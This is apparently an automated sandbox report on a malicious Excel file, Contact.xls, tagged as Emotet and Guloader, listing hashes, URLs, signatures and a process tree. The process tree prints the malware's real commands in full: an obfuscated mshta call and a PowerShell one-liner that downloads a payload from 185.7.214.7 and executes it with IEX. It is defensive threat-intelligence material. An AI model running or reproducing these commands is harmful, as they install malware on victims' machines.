Analysis
- max time kernel: 124s
- max time network: 147s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220112
- submitted: 21-01-2022 03:22
Behavioral task behavioral1
- Sample: Contact.xls
- Resource: win7-en-20211208
Behavioral task behavioral2
- Sample: Contact.xls
- Resource: win10v2004-en-20220112
General
- Target: Contact.xls
- Size: 70KB
- MD5: e04cb27b9dc90bc46db1427db6c0a1e9
- SHA1: f87d71f6ac3588b9c5da2587801c320633783b04
- SHA256: d5b77f3b4a645ee3c6a166172d9b1d5c48f0228ba8cee64332af3cddab84e4a0
- SHA512: c01e9f94b6a319b6f208edbffb16790613a3f207b8a2113534a1c910241b71373e787b3ee394333babf7b014604f3140d5a16385dcdef007f91324584065f09f
Malware Config
Extracted
http://0xb907d607/fer/fe2.html
Extracted
http://185.7.214.7/fer/fe2.png
Extracted
emotet
Epoch4
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: cmd.exe
description | pid | pid_target | process | target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | 2552 | 2448 | cmd.exe | EXCEL.EXE
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes: WerFault.exe
description | pid | process | target process
PID 3668 created 2268 | 3668 | WerFault.exe | mshta.exe
-
Guloader Payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3812-246-0x000001D05EDD0000-0x000001D076FC0000-memory.dmp | family_guloader
-
Blocklisted process makes network request 5 IoCs
Processes: mshta.exe, powershell.exe, rundll32.exe
flow | pid | process
37 | 2268 | mshta.exe
54 | 3812 | powershell.exe
57 | 3812 | powershell.exe
81 | 2260 | rundll32.exe
85 | 2260 | rundll32.exe
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation | mshta.exe
-
Loads dropped DLL 4 IoCs
Processes: rundll32.exe, rundll32.exe, rundll32.exe, rundll32.exe
pid | process
3840 | rundll32.exe
2924 | rundll32.exe
3684 | rundll32.exe
2260 | rundll32.exe
-
Drops file in System32 directory 1 IoCs
Processes: rundll32.exe
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\Mkbak\ipfh.nxy | rundll32.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes: WerFault.exe
pid | pid_target | process | target process
1080 | 2268 | WerFault.exe | mshta.exe
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: EXCEL.EXE, WerFault.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WerFault.exe
-
Enumerates system info in registry 2 TTPs 5 IoCs
Processes: EXCEL.EXE, WerFault.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | EXCEL.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | EXCEL.EXE
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WerFault.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WerFault.exe
-
Modifies data under HKEY_USERS 41 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: EXCEL.EXE
pid | process
2448 | EXCEL.EXE
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes: powershell.exe, WerFault.exe, rundll32.exe
pid | process
3812 | powershell.exe
1080 | WerFault.exe
1080 | WerFault.exe
3812 | powershell.exe
2260 | rundll32.exe
2260 | rundll32.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes: powershell.exe
description | pid | process
Token: SeDebugPrivilege | 3812 | powershell.exe
-
Suspicious use of SetWindowsHookEx 14 IoCs
Processes: EXCEL.EXE
pid | process
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
2448 | EXCEL.EXE
-
Suspicious use of WriteProcessMemory 22 IoCs
Processes: EXCEL.EXE, cmd.exe, mshta.exe, WerFault.exe, powershell.exe, cmd.exe, rundll32.exe, rundll32.exe, rundll32.exe
description | pid | process | target process
PID 2448 wrote to memory of 2552 | 2448 | EXCEL.EXE | cmd.exe
PID 2448 wrote to memory of 2552 | 2448 | EXCEL.EXE | cmd.exe
PID 2552 wrote to memory of 2268 | 2552 | cmd.exe | mshta.exe
PID 2552 wrote to memory of 2268 | 2552 | cmd.exe | mshta.exe
PID 2268 wrote to memory of 3812 | 2268 | mshta.exe | powershell.exe
PID 2268 wrote to memory of 3812 | 2268 | mshta.exe | powershell.exe
PID 3668 wrote to memory of 2268 | 3668 | WerFault.exe | mshta.exe
PID 3668 wrote to memory of 2268 | 3668 | WerFault.exe | mshta.exe
PID 3812 wrote to memory of 3536 | 3812 | powershell.exe | cmd.exe
PID 3812 wrote to memory of 3536 | 3812 | powershell.exe | cmd.exe
PID 3536 wrote to memory of 3840 | 3536 | cmd.exe | rundll32.exe
PID 3536 wrote to memory of 3840 | 3536 | cmd.exe | rundll32.exe
PID 3536 wrote to memory of 3840 | 3536 | cmd.exe | rundll32.exe
PID 3840 wrote to memory of 2924 | 3840 | rundll32.exe | rundll32.exe
PID 3840 wrote to memory of 2924 | 3840 | rundll32.exe | rundll32.exe
PID 3840 wrote to memory of 2924 | 3840 | rundll32.exe | rundll32.exe
PID 2924 wrote to memory of 3684 | 2924 | rundll32.exe | rundll32.exe
PID 2924 wrote to memory of 3684 | 2924 | rundll32.exe | rundll32.exe
PID 2924 wrote to memory of 3684 | 2924 | rundll32.exe | rundll32.exe
PID 3684 wrote to memory of 2260 | 3684 | rundll32.exe | rundll32.exe
PID 3684 wrote to memory of 2260 | 3684 | rundll32.exe | rundll32.exe
PID 3684 wrote to memory of 2260 | 3684 | rundll32.exe | rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (depth 1)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Contact.xls"
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.exe (depth 2)
Command line: cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exe (depth 3)
Command line: mshta http://0xb907d607/fer/fe2.html
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe (depth 5)
Command line: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exe (depth 6)
Command line: C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe (depth 7)
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe (depth 8)
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkbak\ipfh.nxy",zUpM
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe (depth 9)
Command line: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkbak\ipfh.nxy",DllRegisterServer
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exe (depth 4)
Command line: C:\Windows\system32\WerFault.exe -u -p 2268 -s 1704
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exe (depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
-
C:\Windows\System32\WaaSMedicAgent.exe (depth 1)
Command line: C:\Windows\System32\WaaSMedicAgent.exe 733ffa9d30a0a3a8f077b96337298a3b u3pCchQsYkujnCz7FYwSeA.0.1.0.0.0
- Modifies data under HKEY_USERS
-
C:\Windows\system32\WerFault.exe (depth 1)
Command line: C:\Windows\system32\WerFault.exe -pss -s 436 -p 2268 -ip 2268
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Public\Documents\ssd.dll
- MD5: f1eb9fcef8fdfa315b3b1697acbf3130
- SHA1: 32ea2aedbdbd45db0899eff996b550c4518f9aad
- SHA256: 61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d
- SHA512: cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1
-
C:\Windows\SysWOW64\Mkbak\ipfh.nxy
- MD5: f1eb9fcef8fdfa315b3b1697acbf3130
- SHA1: 32ea2aedbdbd45db0899eff996b550c4518f9aad
- SHA256: 61d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d
- SHA512: cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1